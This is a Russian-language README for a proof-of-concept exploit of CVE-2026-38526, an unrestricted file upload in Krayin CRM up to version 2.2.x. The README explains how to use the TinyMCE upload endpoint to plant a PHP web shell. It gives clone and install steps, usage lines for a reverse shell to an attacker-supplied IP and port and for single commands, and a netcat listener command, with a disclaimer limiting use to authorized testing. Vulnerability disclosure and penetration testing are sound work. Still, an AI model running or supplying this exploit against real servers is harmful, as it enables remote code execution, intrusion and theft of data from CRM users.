
Доказательство концепции для CVE-2026-38526 в Krayin CRM <= v2.2.x. Произвольная загрузка файлов, приводящая к удаленному выполнению кода.
Krayin CRM (≤ 2.2.x) - Неограниченная загрузка файлов, приводящая к удаленному выполнению кода.
Этот PoC использует уязвимую конечную точку загрузки TinyMCE (/admin/tinymce/upload) для загрузки PHP-веб-шелла и выполнения команд на сервере.
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
Использование
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
Запустите слушатель:
nc -lvnp 4444
Запустите эксплоит:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
Этот эксплоит предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование против систем, на которые у вас нет явного разрешения для тестирования, незаконно.
Затронутые версии
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
Автор: pawpic Дата: 2026
| Аргумент | Описание | Обязательный |
|---|
| -u, --url | Базовый URL цели | Да |
| -e, --email | Email для входа | Да |
| -p, --password | Пароль для входа | Да |
| -c, --cmd | Выполнить одиночную команду | Нет |
| --lhost | Ваш IP для reverse shell | Да (если не используется --cmd) |
| --lport | Порт прослушивания | Нет (по умолчанию: 4444) |